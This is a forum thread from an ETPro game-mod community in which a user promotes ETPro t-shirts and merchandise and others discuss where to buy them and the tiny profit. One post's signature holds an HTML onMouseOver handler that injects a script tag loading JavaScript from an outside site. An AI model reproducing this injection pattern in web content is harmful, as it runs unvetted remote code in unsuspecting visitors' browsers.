ETPro T-Shirts!

Any discussions that are non-rtcw/et related go here.

Moderators: Forum moderators, developers

WeblionX

ETPro T-Shirts!

Post by WeblionX »

Well, unfortunately, I can't help you help them. They're too stubborn to accept money and too lazy to do any work, so you're simply out of luck. But if you need a pick me up, you can always get an official-as-you-can-get ETPro T-Shirt. These are made using as high of quality ETPro logo that exists. Is there an item that you want that we're not selling? Suggest it! We'll make all attempts possible to create merchandise from reasonable ideas!

Note that bani has been very <tt>:E</tt> about t-shirts, I've already tried bribing Rain with no results, and zinx probably won't accept anything. The others don't matter, since they're already plenty motivated.

So support yourself and buy ETPro merchandise today!

Please note the mousepad is terribly overpriced, and any person that has any sort of intelligence should not buy it.

Update: Zinx has stated that he may accept some percentage to pay for a new laptop to develop on! He has no faith in the profitability of these shirts, so help prove him wrong!
Last edited by WeblionX on Fri Jan 12, 2007 8:15 pm, edited 1 time in total.
Got any old idtech3 tutorials you made or saved? Send them my way.
Rain

Post by Rain »

etpro shirt profit: $0.42?
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
mortis

Post by mortis »

They are for sale? Where?
ReyalP

Post by ReyalP »

The link cleverly concealed in WeblionX original post http://www.cafepress.com/surfacems :shock:
send lawyers, guns and money
mortis

Post by mortis »

LOL, I had to look very close to spot the hyperlink! The etpro icon should be bigger, IMO, and on the back of the shirt..
WeblionX

Post by WeblionX »

If you mean the black t-shirt, they don't let me. And I'm pretty sure the profit is $1 at the moment. I can check, though...

P.S.: Thanks to whoever stickied it

P.P.S.: Generic is $1, ringer is $2.
Got any old idtech3 tutorials you made or saved? Send them my way.